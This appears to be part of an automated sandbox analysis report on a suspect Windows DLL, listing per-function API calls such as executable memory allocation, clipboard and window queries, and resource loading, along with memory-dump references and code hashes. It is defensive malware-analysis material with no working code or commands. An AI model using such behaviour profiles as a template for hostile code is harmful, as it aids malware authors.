                                                                                                                                                                                                                    0x6f207732

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __aulldiv.LIBCMT ref: 6F206598
                                                                                                                                                                                                                    • __aullrem.LIBCMT ref: 6F2065D0
                                                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F206B0C
                                                                                                                                                                                                                    • GetFocus.USER32 ref: 6F206B91
                                                                                                                                                                                                                    • GetUserDefaultLangID.KERNEL32 ref: 6F206BF4
                                                                                                                                                                                                                    • FlushProcessWriteBuffers.KERNEL32 ref: 6F206C23
                                                                                                                                                                                                                    • GetClipboardSequenceNumber.USER32 ref: 6F206C44
                                                                                                                                                                                                                    • GetLargePageMinimum.KERNEL32 ref: 6F206C80
                                                                                                                                                                                                                    • GetCurrentThread.KERNEL32 ref: 6F206C90
                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 6F206CBD
                                                                                                                                                                                                                    • GetLargePageMinimum.KERNEL32 ref: 6F206DFA
                                                                                                                                                                                                                    • GetClipboardViewer.USER32 ref: 6F206E26
                                                                                                                                                                                                                    • GetMenuCheckMarkDimensions.USER32 ref: 6F206F01
                                                                                                                                                                                                                    • GdiFlush.GDI32 ref: 6F207331
                                                                                                                                                                                                                    • GetForegroundWindow.USER32 ref: 6F2070CF
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: GetCurrentThreadId.KERNEL32 ref: 6F205BD2
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: CreateMenu.USER32 ref: 6F205C10
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: CreateMenu.USER32 ref: 6F205C82
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: InitNetworkAddressControl.SHELL32 ref: 6F205D50
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: GetOEMCP.KERNEL32(?,?,00000001,xt), ref: 6F205D77
                                                                                                                                                                                                                      • Part of subcall function 6F205BC0: GetOpenClipboardWindow.USER32(?,00000001,xt), ref: 6F205D85
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipboardMenu$CreateCurrentFlushLargeMinimumPageThreadWindow$AddressAllocBuffersCheckControlDefaultDimensionsFocusForegroundInitLangMarkNetworkNumberOpenProcessSequenceUnothrow_t@std@@@UserViewerVirtualWrite__aulldiv__aullrem__ehfuncinfo$??2@
                                                                                                                                                                                                                    • String ID: *$B
                                                                                                                                                                                                                    • API String ID: 4218567607-2745293630
                                                                                                                                                                                                                    • Opcode ID: 7a9945bca5e3d83f4cae8ce1addf85c6021591e69ae9e6fe183c9f809d50dd9b
                                                                                                                                                                                                                    • Instruction ID: 6d08c595ac619acb4b17649e6c2b0034d38d62ad3781a2680abe239a0cbfd6ea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a9945bca5e3d83f4cae8ce1addf85c6021591e69ae9e6fe183c9f809d50dd9b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9BB27072908B498FC715DF38C49065ABBF6BFCA354F158A1EE489A7251E730E885CF42
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6F2149AF
                                                                                                                                                                                                                    • ___scrt_uninitialize_crt.LIBCMT ref: 6F2149C9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2442719207-0
                                                                                                                                                                                                                    • Opcode ID: d80b4ed6a3a43d28e9ff8183652918f817b04a69a00d4e3d1636b3266bd7e6eb
                                                                                                                                                                                                                    • Instruction ID: a1fd73af277b83351d1c5376c3ffb163edd71d83c57e76df09ac6ab6bcd1a85f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d80b4ed6a3a43d28e9ff8183652918f817b04a69a00d4e3d1636b3266bd7e6eb
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B41D772D0C72DABDB21DF58C800B9E36F5FB46B5EF114215EA186B580D7705A018FD8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F202720: GetTickCount64.KERNEL32 ref: 6F20272E
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F213248
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F213266
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F21327F
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F213281
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F213288
                                                                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 6F2132A6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1927824332-0
                                                                                                                                                                                                                    • Opcode ID: 9c555fd2fa53b1e8b8e36e0cc23dc3ffd4bd087c1cbbb14463398b4f2b543128
                                                                                                                                                                                                                    • Instruction ID: eb4faaa0f0dc899fafea9acf74ab87a8ce424c45c5ad6f6164909e2bba4a5ebc
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c555fd2fa53b1e8b8e36e0cc23dc3ffd4bd087c1cbbb14463398b4f2b543128
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3831BD72C18B488AD703FB3CC446219B7E96F973A4F108716D88577151FBA098E6CF91
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3136044242-0
                                                                                                                                                                                                                    • Opcode ID: 9da8926d6b3b45f55c01bbb88e22bed569ddd11082776d3aa87634f9017d35e9
                                                                                                                                                                                                                    • Instruction ID: bd777090aa83e5088e42b70f2e253c891e44af6046caf93147a5cc7ee5a80b85
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9da8926d6b3b45f55c01bbb88e22bed569ddd11082776d3aa87634f9017d35e9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8216571D0962EABDB31CE54C850EAF3AF9FB86B9EB114215EA1C5B154D330AD018FD8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000103,00000103,00000105,6F2248E3,6F227FDF,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103), ref: 6F22875F
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000007,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F228785
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2287C5
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F2287F8
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000103,000000FF), ref: 6F228805
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                    • Opcode ID: 2ff6bc1c700d1417307c5336f6816f6c564dd404a90cd8576d51943f4a1dedb9
                                                                                                                                                                                                                    • Instruction ID: 3203593c19251940a993d79b9656f8d2d33e6131251d0753ee1152f37ffb5222
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ff6bc1c700d1417307c5336f6816f6c564dd404a90cd8576d51943f4a1dedb9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2C11A57718CA0D77DB0126398C88D9F36EDBB827797250326F528A39C0EF65D825DD21
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                    • Opcode ID: 01520f2fdddeb409a7cb1cdaa914dcf89a2a1134fbf952f8825085c6ed62d06e
                                                                                                                                                                                                                    • Instruction ID: 811ce7f56487dbbbb0c24072f93f1566e6d5e605499448cfbf3dfea218c03002
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 01520f2fdddeb409a7cb1cdaa914dcf89a2a1134fbf952f8825085c6ed62d06e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9931E63364470A5BDB109E3CDC84B5637E9BB82B39F140616E915DBAC0E7B5E94ACF40
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • __RTC_Initialize.LIBCMT ref: 6F2148AE
                                                                                                                                                                                                                      • Part of subcall function 6F214FAF: InitializeSListHead.KERNEL32(6F24C868,6F2148B8,6F2486B0,00000010,6F214849,?,?,?,6F214A71,?,00000001,?,?,00000001,?,6F2486F8), ref: 6F214FB4
                                                                                                                                                                                                                    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6F214918
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3231365870-0
                                                                                                                                                                                                                    • Opcode ID: f3f5bb3e71cb5d2613e036a6f24cb816608fba922c4b1115487f2bd7a93b4f48
                                                                                                                                                                                                                    • Instruction ID: d30cbdc2889fb838a8899f662abc9b90d4a81f2954f21750a0a6e6cec7bf269c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f3f5bb3e71cb5d2613e036a6f24cb816608fba922c4b1115487f2bd7a93b4f48
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC21F27294C31E9BDB10EBB4C80579C33E1BF0336EF20001AC69C6BAC0CBA52504CE99
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlEncodePointer.NTDLL(?,?,6F215557,6F21559D), ref: 6F216C4A
                                                                                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(00000017,6F2286BF,?,6F22CF3F,00000000,00000000,?,030B8168,00000000), ref: 6F227995
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: EncodeFeaturePointerPresentProcessor
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4030241255-0
                                                                                                                                                                                                                    • Opcode ID: 42025148c70f1c783ace17e996d6cccd113544685e147cb5b0d93fff74709de0
                                                                                                                                                                                                                    • Instruction ID: 4cb42d3bf16b126ab96348f91154b27aea1e4c7a51955bf3ac1acef648448c21
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 42025148c70f1c783ace17e996d6cccd113544685e147cb5b0d93fff74709de0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0EF0B470288B0FAAEB156F64E80DB9C3BD59B0272AF000019AB1899CD1DFE19464DD62
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 6F20191E
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2659868963-0
                                                                                                                                                                                                                    • Opcode ID: 7cc8f98925944707bcf25a2ed1fc88e594d4b782da87a8b7b54f60c6e1b66357
                                                                                                                                                                                                                    • Instruction ID: 538de52f48498a806b76c2f3ab896b6305086022d2d583437b5134e4846c9546
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cc8f98925944707bcf25a2ed1fc88e594d4b782da87a8b7b54f60c6e1b66357
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F012B7A81430EA7CB14DBA9DC4098977DCBE022687104636F61C9B880EB70F5948E98
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6F2287B0,00000001,00000364,00000007,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000), ref: 6F22B030
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                    • Opcode ID: 38deea77e4ba52cfd4cb4f29c1e104f6259383b0446057519d18fb7e0dbf489c
                                                                                                                                                                                                                    • Instruction ID: ea84580cc862cad5171445bf7c44527865bce3842283334bf8ee5eaf1ec77c30
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38deea77e4ba52cfd4cb4f29c1e104f6259383b0446057519d18fb7e0dbf489c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2AF0E03295572EA6DB335F358C08B6B37D9AF42771B108112AC34DA580CB60F5148FA1
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 6F227F9C: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    • _free.LIBCMT ref: 6F22FA54
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: HeapFree.KERNEL32(00000000,00000000,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?), ref: 6F227F78
                                                                                                                                                                                                                      • Part of subcall function 6F227F62: GetLastError.KERNEL32(?,?,6F232E1C,?,00000000,?,00000000,?,6F2330C1,?,00000007,?,?,6F2310B4,?,?), ref: 6F227F8A
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$AllocateErrorFreeLast_free
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 314386986-0
                                                                                                                                                                                                                    • Opcode ID: 5495dc858c2a722f0d40bc960d000315ce94b3ea6e102d8e88f4ad12e0f1361e
                                                                                                                                                                                                                    • Instruction ID: a59ba97aa52d84e019c0c8e8dffdd67233d6b6ac4d648f654d9697e9db1ea8f6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5495dc858c2a722f0d40bc960d000315ce94b3ea6e102d8e88f4ad12e0f1361e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03F06DB2109704CFE724DF14D941B43B7F8EB04725F10882ED69A9BA91DBB4B944CF94
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,6F217DD3,00000105,000000FF,24448D6F,00000000,?,6F201817,?,00000103,000000FF), ref: 6F227FCE
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                                                                                    • Opcode ID: 000600fa7b23652ced4414c7d2b1813f7b17d8de307d7d9db1faaaf93c789126
                                                                                                                                                                                                                    • Instruction ID: f558db51c2a886fd7a4c713cb2c104740b3893cb96e0845969239d62bd99fce6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 000600fa7b23652ced4414c7d2b1813f7b17d8de307d7d9db1faaaf93c789126
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3E02B3254C73F67EB111A758D08B9B37C9EF033B2F110115BC28969C0DB20E9008DB8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • CoTaskMemAlloc.OLE32(6F20DE18,819F5D14,00000000,00000000), ref: 6F20E6F8
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,819F5D14,00000000,00000000), ref: 6F20E724
                                                                                                                                                                                                                    • CharNextW.USER32(?,00000000), ref: 6F20E789
                                                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 6F20E78E
                                                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 6F20E793
                                                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 6F20E798
                                                                                                                                                                                                                    • CharNextW.USER32(?), ref: 6F20E7E0
                                                                                                                                                                                                                    • CharNextW.USER32 ref: 6F20E7F0
                                                                                                                                                                                                                    • CharNextW.USER32(00000000,819F5D14,00000000,00000000), ref: 6F20E86A
                                                                                                                                                                                                                    • CharNextW.USER32 ref: 6F20E893
                                                                                                                                                                                                                    • CharNextW.USER32(00000000), ref: 6F20E8C7
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 6F20E8DD
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,?), ref: 6F20E92C
                                                                                                                                                                                                                    • CharNextW.USER32 ref: 6F20E9B2
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 6F20E9E3
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,819F5D14,00000000,00000000), ref: 6F20EA01
                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(?,6F244C8C,?,00000000,C000008C,00000000,00000000), ref: 6F20EABD
                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000,C000008C,00000000,00000000), ref: 6F20EADC
                                                                                                                                                                                                                    • CharNextW.USER32(?,?,00000000,00000000,00000000,?), ref: 6F20EBA1
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CharNext$Task$Free$lstrcmpi$Alloc
                                                                                                                                                                                                                    • String ID: }}$HKCR$HKCU{Software{Classes
                                                                                                                                                                                                                    • API String ID: 2337762536-1142484189
                                                                                                                                                                                                                    • Opcode ID: fe183cd3a9c6cc6ddead4a16444d956ee498839706a3f48514a31a32d454cc45
                                                                                                                                                                                                                    • Instruction ID: 6f9929285aba509965fca10582bf0be2a4a72df6d6fa9fe9a17188374f8866f9
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fe183cd3a9c6cc6ddead4a16444d956ee498839706a3f48514a31a32d454cc45
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF1C472904B1DDBDF15AFA8C894B9EBBB5BF46310F1001A9E805EF294DB70A884CF51
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6F20DCDD
                                                                                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6F20DCEF
                                                                                                                                                                                                                    • FindResourceW.KERNEL32(00000000,?,?), ref: 6F20DD16
                                                                                                                                                                                                                    • LoadResource.KERNEL32(00000000,00000000), ref: 6F20DD2E
                                                                                                                                                                                                                      • Part of subcall function 6F20D2E0: GetLastError.KERNEL32(8007000E,80004005), ref: 6F20D2E0
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6F20DE1F
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.809848957.000000006F201000.00000020.00020000.sdmp, Offset: 6F200000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809844997.000000006F200000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809875529.000000006F239000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809886713.000000006F24B000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                    • Associated: 00000002.00000002.809892708.000000006F24E000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: LibraryLoad$Resource$ErrorFindFreeLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 328770362-0
                                                                                                                                                                                                                    • Opcode ID: 0d4cdd25fb5db8b97e4a635bc25333750d01432dc0071ab1374c770e5bb6d8f6
                                                                                                                                                                                                                    • Instruction ID: eeab91acf493dfbac8f3a740433c3a36449b7de139f8cf599e1503bfc7b403ae
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d4cdd25fb5db8b97e4a635bc25333750d01432dc0071ab1374c770e5bb6d8f6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5C51D7B3A0521D9BCB21DF64C944B9E77BAEF89714F900169F504A7281DF309A50CF59
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(6F200000,?,00000104), ref: 6F212E0C
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 6F213076
